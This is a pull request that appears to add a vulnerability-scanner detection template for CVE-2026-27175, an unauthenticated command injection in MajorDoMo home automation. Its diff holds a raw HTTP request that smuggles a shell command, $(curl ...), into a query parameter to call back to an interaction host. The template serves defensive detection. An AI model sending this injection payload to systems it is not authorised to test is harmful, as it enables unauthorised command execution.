### PR TITLE
Add CVE-2026-27175: MajorDoMo Unauthenticated Command Injection

### DIFF
--- a/http/cves/2026/CVE-2026-27175.yaml
+++ b/http/cves/2026/CVE-2026-27175.yaml
@@ -44,7 +44,7 @@ http:
 
   - raw:
       - |
-        GET /rc/index.php?command=shutdown&param=$(curl+{{interactsh-url}}/{{randstr}}) HTTP/1.1
+        GET /rc/index.php?command=whoami&param=$(curl+{{interactsh-url}}/{{randstr}}) HTTP/1.1
         Host: {{Hostname}}
 
     matchers-condition: and


### PR DESCRIPTION
## Summary
- **CVE:** CVE-2026-27175
- **CVSS:** 9.8 Critical
- **CWE:** CWE-78 (OS Command Injection)
- **Product:** MajorDoMo home automation
- **Auth Required:** None (unauthenticated)

Detection template for unauthenticated command injection via race condition between cycle_execs.php polling worker and rc/index.php command endpoint.

## References
- https://chocapikk.com/posts/2026/majordomo-revisited/
- https://nvd.nist.gov/vuln/detail/CVE-2026-27175